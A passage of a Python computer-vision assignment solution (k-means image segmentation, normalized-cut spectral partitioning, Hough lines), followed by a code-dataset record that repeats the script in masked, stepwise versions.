                # pixels bounds the magnitude by 1 (it is squared below)
euclDist = (centers - idx) / data.shape[0]
cost = np.square(data[idx] - centerVals) + np.square(euclDist)
index[idx] = np.random.choice(np.where(cost == np.min(cost))[0])
clusters[index[idx]].append(idx)
# update clusters' centers and check for convergence
# ...
convCounter = 0
for idx in range(centers.shape[0]):
if (len(clusters[idx]) > 0):
if data.shape[1] == 1:
meanVal = np.mean(data[clusters[idx]])
elif data.shape[1] == 3:
meanVal = np.mean(data[clusters[idx]], axis = 0)
diff = (np.abs(centerVals[idx] - meanVal)*255).astype('uint8')
if (np.sum(diff) > threshold):
indices = np.unique(np.where((data*255).astype('uint8') == (meanVal*255).astype('uint8'))[0])
if indices.size > 0:
centers[idx] = np.random.choice(indices)
else:
# if no pixel with the mean value is found, choose another pixel in the cluster
# and continue
centers[idx] = np.random.choice(clusters[idx])
else:
convCounter += 1
else:
convCounter += 1
if convCounter == k:
convergence = True
iterationNo += 1
print('iterationNo = ', iterationNo)
print('-------------------------------------------------')
end_time = time.time()
print('Data Clustered for K = ' + str(k) + ' in ' + str(round(end_time - start_time, 5)) + ' seconds')
print('-------------------------------------------------')
return index, centers
def task_3_a():
print("Task 3 (a) ...")
print('-------------------------------------------------')
img = cv.imread('../images/flower.png')
'''
...
your code ...
...
'''
grayImg = cv.cvtColor(img, cv.COLOR_BGR2GRAY).astype('float32')
grayImg /= 255
cv.imshow('Intensity Image', grayImg)
K = [2, 4, 6]
for k in K:
print('K = ' + str(k))
print('-------------------------------------------------')
grayVec = np.reshape(grayImg.copy(), (-1,1))
index, centers = myKmeans(grayVec, k)
for kVal in range(k):
indices = np.where(index == kVal)[0]
grayVec[indices] = grayVec[centers[kVal]]
cv.imshow('Segmented Intensity Image for k = ' + str(k), grayVec.reshape(grayImg.shape))
cv.waitKey(0)
print('=================================================')
def task_3_b():
print("Task 3 (b) ...")
print('-------------------------------------------------')
img = cv.imread('../images/flower.png')
'''
...
your code ...
...
'''
imgFloat = img.copy().astype('float64')
imgFloat /= 255
cv.imshow('Color Image', imgFloat)
K = [2, 4, 6]
for k in K:
print('K = ' + str(k))
print('-------------------------------------------------')
imgVec = np.reshape(imgFloat.copy(), (-1,3))
index, centers = myKmeans(imgVec, k)
for kVal in range(k):
indices = np.where(index == kVal)[0]
imgVec[indices] = imgVec[centers[kVal]]
cv.imshow('Segmented Color Image for k = ' + str(k), imgVec.reshape(imgFloat.shape))
cv.waitKey(0)
print('=================================================')
def task_3_c():
print("Task 3 (c) ...")
print('-------------------------------------------------')
img = cv.imread('../images/flower.png')
'''
...
your code ...
...
'''
grayImg = cv.cvtColor(img, cv.COLOR_BGR2GRAY).astype('float32')
grayImg /= 255
cv.imshow('Intensity Image', grayImg)
K = [2, 4, 6]
for k in K:
print('K = ' + str(k))
print('-------------------------------------------------')
grayVec = np.reshape(grayImg.copy(), (-1,1))
index, centers = myKmeans(grayVec, k, useDist = True)
for kVal in range(k):
indices = np.where(index == kVal)[0]
grayVec[indices] = grayVec[centers[kVal]]
cv.imshow('Segmented Intensity Image (Scaled Distance) for k = ' + str(k), grayVec.reshape(grayImg.shape))
cv.waitKey(0)
print('=================================================')
##############################################
# Task 4 ##########################
##############################################
def task_4_a():
print("Task 4 (a) ...")
print('-------------------------------------------------')
D = np.zeros((8,8))
W = np.array((
[0, 1, 0.2, 1, 0, 0, 0, 0], # A
[1, 0, 0.1, 0, 1, 0, 0, 0], # B
[0.2, 0.1, 0, 1, 0, 1, 0.3, 0], # C
[1, 0, 1, 0, 0, 1, 0, 0], # D
[0, 1, 0, 0, 0, 0, 1, 1], # E
[0, 0, 1, 1, 0, 0, 1, 0], # F
[0, 0, 0.3, 0, 1, 1, 0, 1], # G
[0, 0, 0, 0, 1, 0, 1, 0] # H
)) # construct the W matrix
for i in range(W.shape[0]):
D[i,i] = np.sum(W[i,:]) # construct the D matrix
'''
...
your code ...
...
'''
invSqrtD = np.linalg.inv(np.sqrt(D))
L = D - W
op = np.matmul(np.matmul(invSqrtD,L),invSqrtD)
_, _, eigenVecs = cv.eigen(op)
secMinEigenVec = eigenVecs[eigenVecs.shape[1]-2, :]
C1 = 0
C2 = 0
for i in range(secMinEigenVec.shape[0]):
if secMinEigenVec[i] < 0:
C1 += D[i,i]
else:
C2 += D[i,i]
print('Eigen Vec: ' + str(np.round(secMinEigenVec, 3)))
    # Ncut(A, B) = cut(A, B) * (1/assoc(A, V) + 1/assoc(B, V));
    # the crossing-edge weight 2.4 is taken from the graph figure in the exercise pdf
    minNormCut = (1/C1 + 1/C2) * 2.4
print('Min Norm Cut = ' + str(minNormCut))
print('=================================================')
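# norm_cut_from_partition is NOT part of the original submission. It sketches
# how the hard-coded cut weight (2.4, read from the exercise figure) could be
# computed directly from W and the sign-based partition of the second-smallest
# eigenvector, using Ncut(A, B) = cut(A, B) * (1/assoc(A, V) + 1/assoc(B, V)):
def norm_cut_from_partition(W, D, partition_mask):
    """partition_mask[i] is True for vertices assigned to set A."""
    A = np.where(partition_mask)[0]
    B = np.where(~partition_mask)[0]
    cut = W[np.ix_(A, B)].sum()   # total weight of edges crossing the cut
    assoc_A = D[A, A].sum()       # total degree of the vertices in A
    assoc_B = D[B, B].sum()       # total degree of the vertices in B
    return cut * (1.0 / assoc_A + 1.0 / assoc_B)
# Illustrative usage inside task_4_a: norm_cut_from_partition(W, D, secMinEigenVec < 0)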
##############################################
##############################################
##############################################
# task_1_a()
# task_1_b()
# task_2()
# task_3_a()
# cv.destroyAllWindows()
# task_3_b()
# cv.destroyAllWindows()
# task_3_c()
# cv.destroyAllWindows()
task_4_a()
|
normal
|
{
"blob_id": "f7886f8d98ad0519f4635064f768f25dad101a3d",
"index": 2612,
"step-1": "<mask token>\n\n\ndef displayImage(winName, img):\n \"\"\" Helper function to display image\n arguments:\n winName -- Name of display window\n img -- Source Image\n \"\"\"\n cv.imshow(winName, img)\n cv.waitKey(0)\n\n\ndef task_1_a():\n print('Task 1 (a) ...')\n img = cv.imread('../images/shapes.png')\n gray_image = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n edges = cv.Canny(gray_image, 50, 150)\n detected_lines = cv.HoughLines(edges, 1, np.pi / 180, 10)\n for rho, theta in detected_lines[0]:\n a = np.cos(theta)\n b = np.sin(theta)\n x0 = a * rho\n y0 = b * rho\n x1 = int(x0 + 1000 * -b)\n y1 = int(y0 + 1000 * a)\n x2 = int(x0 - 1000 * -b)\n y2 = int(y0 - 1000 * a)\n cv.line(img, (x1, y1), (x2, y2), (0, 255, 0), 1)\n displayImage('1_a Hough transform - detected lines ', img)\n\n\n<mask token>\n\n\ndef task_1_b():\n print('Task 1 (b) ...')\n img = cv.imread('../images/shapes.png')\n img_gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n edges = cv.Canny(img_gray, 50, 150)\n detected_lines, accumulator = myHoughLines(edges, 1, 2, 50)\n cv.imshow('1_b Accumulator myHoughLines', accumulator)\n for theta, rho in detected_lines:\n a = np.cos(theta)\n b = np.sin(theta)\n x0 = a * rho\n y0 = b * rho\n x1 = int(x0 + 1000 * -b)\n y1 = int(y0 + 1000 * a)\n x2 = int(x0 - 1000 * -b)\n y2 = int(y0 - 1000 * a)\n cv.line(img, (x1, y1), (x2, y2), (0, 0, 255), 2)\n displayImage('1_b Hough transform - own implementation', img)\n\n\ndef task_2():\n print('Task 2 ...')\n img = cv.imread('../images/line.png')\n img_gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n edges = cv.Canny(img_gray, 50, 150, apertureSize=3)\n theta_res = 1\n d_res = 1\n _, accumulator = myHoughLines(edges, d_res, theta_res, 50)\n displayImage('task_2_ accumulator - mean shift', accumulator)\n\n\ndef myKmeans(data, k, useDist=False):\n \"\"\"\n :return: centers and list of indices that store the cluster index for each data point\n \"\"\"\n centers = np.zeros((k, 1), dtype=int)\n index = np.zeros(data.shape[0], dtype=int)\n clusters = [[] for i in range(k)]\n threshold = 0\n if data.shape[1] > 1:\n threshold = 20\n print('Threshold value = ' + str(threshold))\n print('-------------------------------------------------')\n for idx in range(centers.shape[0]):\n randIdx = random.choice(range(data.shape[0]))\n centers[idx] = randIdx\n convergence = False\n iterationNo = 0\n start_time = time.time()\n while not convergence:\n euclDist = 0\n centerVals = data[centers]\n for idx in range(data.shape[0]):\n if useDist:\n euclDist = (centers - idx) / data.shape[0]\n cost = np.square(data[idx] - centerVals) + np.square(euclDist)\n index[idx] = np.random.choice(np.where(cost == np.min(cost))[0])\n clusters[index[idx]].append(idx)\n convCounter = 0\n for idx in range(centers.shape[0]):\n if len(clusters[idx]) > 0:\n if data.shape[1] == 1:\n meanVal = np.mean(data[clusters[idx]])\n elif data.shape[1] == 3:\n meanVal = np.mean(data[clusters[idx]], axis=0)\n diff = (np.abs(centerVals[idx] - meanVal) * 255).astype('uint8'\n )\n if np.sum(diff) > threshold:\n indices = np.unique(np.where((data * 255).astype(\n 'uint8') == (meanVal * 255).astype('uint8'))[0])\n if indices.size > 0:\n centers[idx] = np.random.choice(indices)\n else:\n centers[idx] = np.random.choice(clusters[idx])\n else:\n convCounter += 1\n else:\n convCounter += 1\n if convCounter == k:\n convergence = True\n iterationNo += 1\n print('iterationNo = ', iterationNo)\n print('-------------------------------------------------')\n end_time = time.time()\n print('Data Clustered for K = ' + str(k) + ' 
in ' + str(round(end_time -\n start_time, 5)) + ' seconds')\n print('-------------------------------------------------')\n return index, centers\n\n\ndef task_3_a():\n print('Task 3 (a) ...')\n print('-------------------------------------------------')\n img = cv.imread('../images/flower.png')\n \"\"\"\n ...\n your code ...\n ...\n \"\"\"\n grayImg = cv.cvtColor(img, cv.COLOR_BGR2GRAY).astype('float32')\n grayImg /= 255\n cv.imshow('Intensity Image', grayImg)\n K = [2, 4, 6]\n for k in K:\n print('K = ' + str(k))\n print('-------------------------------------------------')\n grayVec = np.reshape(grayImg.copy(), (-1, 1))\n index, centers = myKmeans(grayVec, k)\n for kVal in range(k):\n indices = np.where(index == kVal)[0]\n grayVec[indices] = grayVec[centers[kVal]]\n cv.imshow('Segmented Intensity Image for k = ' + str(k), grayVec.\n reshape(grayImg.shape))\n cv.waitKey(0)\n print('=================================================')\n\n\n<mask token>\n\n\ndef task_3_c():\n print('Task 3 (c) ...')\n print('-------------------------------------------------')\n img = cv.imread('../images/flower.png')\n \"\"\"\n ...\n your code ...\n ...\n \"\"\"\n grayImg = cv.cvtColor(img, cv.COLOR_BGR2GRAY).astype('float32')\n grayImg /= 255\n cv.imshow('Intensity Image', grayImg)\n K = [2, 4, 6]\n for k in K:\n print('K = ' + str(k))\n print('-------------------------------------------------')\n grayVec = np.reshape(grayImg.copy(), (-1, 1))\n index, centers = myKmeans(grayVec, k, useDist=True)\n for kVal in range(k):\n indices = np.where(index == kVal)[0]\n grayVec[indices] = grayVec[centers[kVal]]\n cv.imshow('Segmented Intensity Image (Scaled Distance) for k = ' +\n str(k), grayVec.reshape(grayImg.shape))\n cv.waitKey(0)\n print('=================================================')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef displayImage(winName, img):\n \"\"\" Helper function to display image\n arguments:\n winName -- Name of display window\n img -- Source Image\n \"\"\"\n cv.imshow(winName, img)\n cv.waitKey(0)\n\n\ndef task_1_a():\n print('Task 1 (a) ...')\n img = cv.imread('../images/shapes.png')\n gray_image = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n edges = cv.Canny(gray_image, 50, 150)\n detected_lines = cv.HoughLines(edges, 1, np.pi / 180, 10)\n for rho, theta in detected_lines[0]:\n a = np.cos(theta)\n b = np.sin(theta)\n x0 = a * rho\n y0 = b * rho\n x1 = int(x0 + 1000 * -b)\n y1 = int(y0 + 1000 * a)\n x2 = int(x0 - 1000 * -b)\n y2 = int(y0 - 1000 * a)\n cv.line(img, (x1, y1), (x2, y2), (0, 255, 0), 1)\n displayImage('1_a Hough transform - detected lines ', img)\n\n\n<mask token>\n\n\ndef task_1_b():\n print('Task 1 (b) ...')\n img = cv.imread('../images/shapes.png')\n img_gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n edges = cv.Canny(img_gray, 50, 150)\n detected_lines, accumulator = myHoughLines(edges, 1, 2, 50)\n cv.imshow('1_b Accumulator myHoughLines', accumulator)\n for theta, rho in detected_lines:\n a = np.cos(theta)\n b = np.sin(theta)\n x0 = a * rho\n y0 = b * rho\n x1 = int(x0 + 1000 * -b)\n y1 = int(y0 + 1000 * a)\n x2 = int(x0 - 1000 * -b)\n y2 = int(y0 - 1000 * a)\n cv.line(img, (x1, y1), (x2, y2), (0, 0, 255), 2)\n displayImage('1_b Hough transform - own implementation', img)\n\n\ndef task_2():\n print('Task 2 ...')\n img = cv.imread('../images/line.png')\n img_gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n edges = cv.Canny(img_gray, 50, 150, apertureSize=3)\n theta_res = 1\n d_res = 1\n _, accumulator = myHoughLines(edges, d_res, theta_res, 50)\n displayImage('task_2_ accumulator - mean shift', accumulator)\n\n\ndef myKmeans(data, k, useDist=False):\n \"\"\"\n :return: centers and list of indices that store the cluster index for each data point\n \"\"\"\n centers = np.zeros((k, 1), dtype=int)\n index = np.zeros(data.shape[0], dtype=int)\n clusters = [[] for i in range(k)]\n threshold = 0\n if data.shape[1] > 1:\n threshold = 20\n print('Threshold value = ' + str(threshold))\n print('-------------------------------------------------')\n for idx in range(centers.shape[0]):\n randIdx = random.choice(range(data.shape[0]))\n centers[idx] = randIdx\n convergence = False\n iterationNo = 0\n start_time = time.time()\n while not convergence:\n euclDist = 0\n centerVals = data[centers]\n for idx in range(data.shape[0]):\n if useDist:\n euclDist = (centers - idx) / data.shape[0]\n cost = np.square(data[idx] - centerVals) + np.square(euclDist)\n index[idx] = np.random.choice(np.where(cost == np.min(cost))[0])\n clusters[index[idx]].append(idx)\n convCounter = 0\n for idx in range(centers.shape[0]):\n if len(clusters[idx]) > 0:\n if data.shape[1] == 1:\n meanVal = np.mean(data[clusters[idx]])\n elif data.shape[1] == 3:\n meanVal = np.mean(data[clusters[idx]], axis=0)\n diff = (np.abs(centerVals[idx] - meanVal) * 255).astype('uint8'\n )\n if np.sum(diff) > threshold:\n indices = np.unique(np.where((data * 255).astype(\n 'uint8') == (meanVal * 255).astype('uint8'))[0])\n if indices.size > 0:\n centers[idx] = np.random.choice(indices)\n else:\n centers[idx] = np.random.choice(clusters[idx])\n else:\n convCounter += 1\n else:\n convCounter += 1\n if convCounter == k:\n convergence = True\n iterationNo += 1\n print('iterationNo = ', iterationNo)\n print('-------------------------------------------------')\n end_time = time.time()\n print('Data Clustered for K = ' + str(k) + ' 
in ' + str(round(end_time -\n start_time, 5)) + ' seconds')\n print('-------------------------------------------------')\n return index, centers\n\n\ndef task_3_a():\n print('Task 3 (a) ...')\n print('-------------------------------------------------')\n img = cv.imread('../images/flower.png')\n \"\"\"\n ...\n your code ...\n ...\n \"\"\"\n grayImg = cv.cvtColor(img, cv.COLOR_BGR2GRAY).astype('float32')\n grayImg /= 255\n cv.imshow('Intensity Image', grayImg)\n K = [2, 4, 6]\n for k in K:\n print('K = ' + str(k))\n print('-------------------------------------------------')\n grayVec = np.reshape(grayImg.copy(), (-1, 1))\n index, centers = myKmeans(grayVec, k)\n for kVal in range(k):\n indices = np.where(index == kVal)[0]\n grayVec[indices] = grayVec[centers[kVal]]\n cv.imshow('Segmented Intensity Image for k = ' + str(k), grayVec.\n reshape(grayImg.shape))\n cv.waitKey(0)\n print('=================================================')\n\n\ndef task_3_b():\n print('Task 3 (b) ...')\n print('-------------------------------------------------')\n img = cv.imread('../images/flower.png')\n \"\"\"\n ...\n your code ...\n ...\n \"\"\"\n imgFloat = img.copy().astype('float64')\n imgFloat /= 255\n cv.imshow('Color Image', imgFloat)\n K = [2, 4, 6]\n for k in K:\n print('K = ' + str(k))\n print('-------------------------------------------------')\n imgVec = np.reshape(imgFloat.copy(), (-1, 3))\n index, centers = myKmeans(imgVec, k)\n for kVal in range(k):\n indices = np.where(index == kVal)[0]\n imgVec[indices] = imgVec[centers[kVal]]\n cv.imshow('Segmented Color Image for k = ' + str(k), imgVec.reshape\n (imgFloat.shape))\n cv.waitKey(0)\n print('=================================================')\n\n\ndef task_3_c():\n print('Task 3 (c) ...')\n print('-------------------------------------------------')\n img = cv.imread('../images/flower.png')\n \"\"\"\n ...\n your code ...\n ...\n \"\"\"\n grayImg = cv.cvtColor(img, cv.COLOR_BGR2GRAY).astype('float32')\n grayImg /= 255\n cv.imshow('Intensity Image', grayImg)\n K = [2, 4, 6]\n for k in K:\n print('K = ' + str(k))\n print('-------------------------------------------------')\n grayVec = np.reshape(grayImg.copy(), (-1, 1))\n index, centers = myKmeans(grayVec, k, useDist=True)\n for kVal in range(k):\n indices = np.where(index == kVal)[0]\n grayVec[indices] = grayVec[centers[kVal]]\n cv.imshow('Segmented Intensity Image (Scaled Distance) for k = ' +\n str(k), grayVec.reshape(grayImg.shape))\n cv.waitKey(0)\n print('=================================================')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef displayImage(winName, img):\n \"\"\" Helper function to display image\n arguments:\n winName -- Name of display window\n img -- Source Image\n \"\"\"\n cv.imshow(winName, img)\n cv.waitKey(0)\n\n\ndef task_1_a():\n print('Task 1 (a) ...')\n img = cv.imread('../images/shapes.png')\n gray_image = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n edges = cv.Canny(gray_image, 50, 150)\n detected_lines = cv.HoughLines(edges, 1, np.pi / 180, 10)\n for rho, theta in detected_lines[0]:\n a = np.cos(theta)\n b = np.sin(theta)\n x0 = a * rho\n y0 = b * rho\n x1 = int(x0 + 1000 * -b)\n y1 = int(y0 + 1000 * a)\n x2 = int(x0 - 1000 * -b)\n y2 = int(y0 - 1000 * a)\n cv.line(img, (x1, y1), (x2, y2), (0, 255, 0), 1)\n displayImage('1_a Hough transform - detected lines ', img)\n\n\ndef myHoughLines(img_edges, d_resolution, theta_step_sz, threshold):\n \"\"\"\n Your implementation of HoughLines\n :param img_edges: single-channel binary source image (e.g: edges)\n :param d_resolution: the resolution for the distance parameter\n :param theta_step_sz: the resolution for the angle parameter\n :param threshold: minimum number of votes to consider a detection\n :return: list of detected lines as (d, theta) pairs and the accumulator\n \"\"\"\n accumulator = np.zeros((int(180 / theta_step_sz), int(np.linalg.norm(\n img_edges.shape) / d_resolution)))\n detected_lines = []\n rho = int(np.linalg.norm(img_edges.shape) / d_resolution)\n theta = int(180 / theta_step_sz)\n theta_array = np.deg2rad(np.arange(-90, 90, theta_step_sz))\n width, height = img_edges.shape\n img_edges_copy = img_edges.copy()\n detected_lines = []\n for x in range(width):\n for y in range(height):\n if img_edges_copy[x, y]:\n for index_theta in range(len(theta_array)):\n rho_value = x * np.cos(theta_array[index_theta]\n ) + y * np.sin(theta_array[index_theta])\n index_rho = int(rho_value + rho / 2)\n if index_rho >= rho:\n continue\n accumulator[index_theta, index_rho] += 1\n if accumulator[index_theta, index_rho] >= threshold:\n detected_lines.append((theta_array[index_theta],\n rho_value))\n return detected_lines, accumulator\n\n\ndef task_1_b():\n print('Task 1 (b) ...')\n img = cv.imread('../images/shapes.png')\n img_gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n edges = cv.Canny(img_gray, 50, 150)\n detected_lines, accumulator = myHoughLines(edges, 1, 2, 50)\n cv.imshow('1_b Accumulator myHoughLines', accumulator)\n for theta, rho in detected_lines:\n a = np.cos(theta)\n b = np.sin(theta)\n x0 = a * rho\n y0 = b * rho\n x1 = int(x0 + 1000 * -b)\n y1 = int(y0 + 1000 * a)\n x2 = int(x0 - 1000 * -b)\n y2 = int(y0 - 1000 * a)\n cv.line(img, (x1, y1), (x2, y2), (0, 0, 255), 2)\n displayImage('1_b Hough transform - own implementation', img)\n\n\ndef task_2():\n print('Task 2 ...')\n img = cv.imread('../images/line.png')\n img_gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n edges = cv.Canny(img_gray, 50, 150, apertureSize=3)\n theta_res = 1\n d_res = 1\n _, accumulator = myHoughLines(edges, d_res, theta_res, 50)\n displayImage('task_2_ accumulator - mean shift', accumulator)\n\n\ndef myKmeans(data, k, useDist=False):\n \"\"\"\n :return: centers and list of indices that store the cluster index for each data point\n \"\"\"\n centers = np.zeros((k, 1), dtype=int)\n index = np.zeros(data.shape[0], dtype=int)\n clusters = [[] for i in range(k)]\n threshold = 0\n if data.shape[1] > 1:\n threshold = 20\n print('Threshold value = ' + str(threshold))\n print('-------------------------------------------------')\n for idx in 
range(centers.shape[0]):\n randIdx = random.choice(range(data.shape[0]))\n centers[idx] = randIdx\n convergence = False\n iterationNo = 0\n start_time = time.time()\n while not convergence:\n euclDist = 0\n centerVals = data[centers]\n for idx in range(data.shape[0]):\n if useDist:\n euclDist = (centers - idx) / data.shape[0]\n cost = np.square(data[idx] - centerVals) + np.square(euclDist)\n index[idx] = np.random.choice(np.where(cost == np.min(cost))[0])\n clusters[index[idx]].append(idx)\n convCounter = 0\n for idx in range(centers.shape[0]):\n if len(clusters[idx]) > 0:\n if data.shape[1] == 1:\n meanVal = np.mean(data[clusters[idx]])\n elif data.shape[1] == 3:\n meanVal = np.mean(data[clusters[idx]], axis=0)\n diff = (np.abs(centerVals[idx] - meanVal) * 255).astype('uint8'\n )\n if np.sum(diff) > threshold:\n indices = np.unique(np.where((data * 255).astype(\n 'uint8') == (meanVal * 255).astype('uint8'))[0])\n if indices.size > 0:\n centers[idx] = np.random.choice(indices)\n else:\n centers[idx] = np.random.choice(clusters[idx])\n else:\n convCounter += 1\n else:\n convCounter += 1\n if convCounter == k:\n convergence = True\n iterationNo += 1\n print('iterationNo = ', iterationNo)\n print('-------------------------------------------------')\n end_time = time.time()\n print('Data Clustered for K = ' + str(k) + ' in ' + str(round(end_time -\n start_time, 5)) + ' seconds')\n print('-------------------------------------------------')\n return index, centers\n\n\ndef task_3_a():\n print('Task 3 (a) ...')\n print('-------------------------------------------------')\n img = cv.imread('../images/flower.png')\n \"\"\"\n ...\n your code ...\n ...\n \"\"\"\n grayImg = cv.cvtColor(img, cv.COLOR_BGR2GRAY).astype('float32')\n grayImg /= 255\n cv.imshow('Intensity Image', grayImg)\n K = [2, 4, 6]\n for k in K:\n print('K = ' + str(k))\n print('-------------------------------------------------')\n grayVec = np.reshape(grayImg.copy(), (-1, 1))\n index, centers = myKmeans(grayVec, k)\n for kVal in range(k):\n indices = np.where(index == kVal)[0]\n grayVec[indices] = grayVec[centers[kVal]]\n cv.imshow('Segmented Intensity Image for k = ' + str(k), grayVec.\n reshape(grayImg.shape))\n cv.waitKey(0)\n print('=================================================')\n\n\ndef task_3_b():\n print('Task 3 (b) ...')\n print('-------------------------------------------------')\n img = cv.imread('../images/flower.png')\n \"\"\"\n ...\n your code ...\n ...\n \"\"\"\n imgFloat = img.copy().astype('float64')\n imgFloat /= 255\n cv.imshow('Color Image', imgFloat)\n K = [2, 4, 6]\n for k in K:\n print('K = ' + str(k))\n print('-------------------------------------------------')\n imgVec = np.reshape(imgFloat.copy(), (-1, 3))\n index, centers = myKmeans(imgVec, k)\n for kVal in range(k):\n indices = np.where(index == kVal)[0]\n imgVec[indices] = imgVec[centers[kVal]]\n cv.imshow('Segmented Color Image for k = ' + str(k), imgVec.reshape\n (imgFloat.shape))\n cv.waitKey(0)\n print('=================================================')\n\n\ndef task_3_c():\n print('Task 3 (c) ...')\n print('-------------------------------------------------')\n img = cv.imread('../images/flower.png')\n \"\"\"\n ...\n your code ...\n ...\n \"\"\"\n grayImg = cv.cvtColor(img, cv.COLOR_BGR2GRAY).astype('float32')\n grayImg /= 255\n cv.imshow('Intensity Image', grayImg)\n K = [2, 4, 6]\n for k in K:\n print('K = ' + str(k))\n print('-------------------------------------------------')\n grayVec = np.reshape(grayImg.copy(), (-1, 1))\n index, centers = 
myKmeans(grayVec, k, useDist=True)\n for kVal in range(k):\n indices = np.where(index == kVal)[0]\n grayVec[indices] = grayVec[centers[kVal]]\n cv.imshow('Segmented Intensity Image (Scaled Distance) for k = ' +\n str(k), grayVec.reshape(grayImg.shape))\n cv.waitKey(0)\n print('=================================================')\n\n\ndef task_4_a():\n print('Task 4 (a) ...')\n print('-------------------------------------------------')\n D = np.zeros((8, 8))\n W = np.array(([0, 1, 0.2, 1, 0, 0, 0, 0], [1, 0, 0.1, 0, 1, 0, 0, 0], [\n 0.2, 0.1, 0, 1, 0, 1, 0.3, 0], [1, 0, 1, 0, 0, 1, 0, 0], [0, 1, 0, \n 0, 0, 0, 1, 1], [0, 0, 1, 1, 0, 0, 1, 0], [0, 0, 0.3, 0, 1, 1, 0, 1\n ], [0, 0, 0, 0, 1, 0, 1, 0]))\n for i in range(W.shape[0]):\n D[i, i] = np.sum(W[i, :])\n \"\"\"\n ...\n your code ...\n ...\n \"\"\"\n invSqrtD = np.linalg.inv(np.sqrt(D))\n L = D - W\n op = np.matmul(np.matmul(invSqrtD, L), invSqrtD)\n _, _, eigenVecs = cv.eigen(op)\n secMinEigenVec = eigenVecs[eigenVecs.shape[1] - 2, :]\n C1 = 0\n C2 = 0\n for i in range(secMinEigenVec.shape[0]):\n if secMinEigenVec[i] < 0:\n C1 += D[i, i]\n else:\n C2 += D[i, i]\n print('Eigen Vec: ' + str(np.round(secMinEigenVec, 3)))\n minNormCut = (1 / C1 + 1 / C2) * 2.4\n print('Min Norm Cut = ' + str(minNormCut))\n print('=================================================')\n\n\n<mask token>\n",
"step-4": "import numpy as np\nimport cv2 as cv\nimport random\nimport time\nrandom.seed(0)\n\n\ndef displayImage(winName, img):\n \"\"\" Helper function to display image\n arguments:\n winName -- Name of display window\n img -- Source Image\n \"\"\"\n cv.imshow(winName, img)\n cv.waitKey(0)\n\n\ndef task_1_a():\n print('Task 1 (a) ...')\n img = cv.imread('../images/shapes.png')\n gray_image = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n edges = cv.Canny(gray_image, 50, 150)\n detected_lines = cv.HoughLines(edges, 1, np.pi / 180, 10)\n for rho, theta in detected_lines[0]:\n a = np.cos(theta)\n b = np.sin(theta)\n x0 = a * rho\n y0 = b * rho\n x1 = int(x0 + 1000 * -b)\n y1 = int(y0 + 1000 * a)\n x2 = int(x0 - 1000 * -b)\n y2 = int(y0 - 1000 * a)\n cv.line(img, (x1, y1), (x2, y2), (0, 255, 0), 1)\n displayImage('1_a Hough transform - detected lines ', img)\n\n\ndef myHoughLines(img_edges, d_resolution, theta_step_sz, threshold):\n \"\"\"\n Your implementation of HoughLines\n :param img_edges: single-channel binary source image (e.g: edges)\n :param d_resolution: the resolution for the distance parameter\n :param theta_step_sz: the resolution for the angle parameter\n :param threshold: minimum number of votes to consider a detection\n :return: list of detected lines as (d, theta) pairs and the accumulator\n \"\"\"\n accumulator = np.zeros((int(180 / theta_step_sz), int(np.linalg.norm(\n img_edges.shape) / d_resolution)))\n detected_lines = []\n rho = int(np.linalg.norm(img_edges.shape) / d_resolution)\n theta = int(180 / theta_step_sz)\n theta_array = np.deg2rad(np.arange(-90, 90, theta_step_sz))\n width, height = img_edges.shape\n img_edges_copy = img_edges.copy()\n detected_lines = []\n for x in range(width):\n for y in range(height):\n if img_edges_copy[x, y]:\n for index_theta in range(len(theta_array)):\n rho_value = x * np.cos(theta_array[index_theta]\n ) + y * np.sin(theta_array[index_theta])\n index_rho = int(rho_value + rho / 2)\n if index_rho >= rho:\n continue\n accumulator[index_theta, index_rho] += 1\n if accumulator[index_theta, index_rho] >= threshold:\n detected_lines.append((theta_array[index_theta],\n rho_value))\n return detected_lines, accumulator\n\n\ndef task_1_b():\n print('Task 1 (b) ...')\n img = cv.imread('../images/shapes.png')\n img_gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n edges = cv.Canny(img_gray, 50, 150)\n detected_lines, accumulator = myHoughLines(edges, 1, 2, 50)\n cv.imshow('1_b Accumulator myHoughLines', accumulator)\n for theta, rho in detected_lines:\n a = np.cos(theta)\n b = np.sin(theta)\n x0 = a * rho\n y0 = b * rho\n x1 = int(x0 + 1000 * -b)\n y1 = int(y0 + 1000 * a)\n x2 = int(x0 - 1000 * -b)\n y2 = int(y0 - 1000 * a)\n cv.line(img, (x1, y1), (x2, y2), (0, 0, 255), 2)\n displayImage('1_b Hough transform - own implementation', img)\n\n\ndef task_2():\n print('Task 2 ...')\n img = cv.imread('../images/line.png')\n img_gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n edges = cv.Canny(img_gray, 50, 150, apertureSize=3)\n theta_res = 1\n d_res = 1\n _, accumulator = myHoughLines(edges, d_res, theta_res, 50)\n displayImage('task_2_ accumulator - mean shift', accumulator)\n\n\ndef myKmeans(data, k, useDist=False):\n \"\"\"\n :return: centers and list of indices that store the cluster index for each data point\n \"\"\"\n centers = np.zeros((k, 1), dtype=int)\n index = np.zeros(data.shape[0], dtype=int)\n clusters = [[] for i in range(k)]\n threshold = 0\n if data.shape[1] > 1:\n threshold = 20\n print('Threshold value = ' + str(threshold))\n 
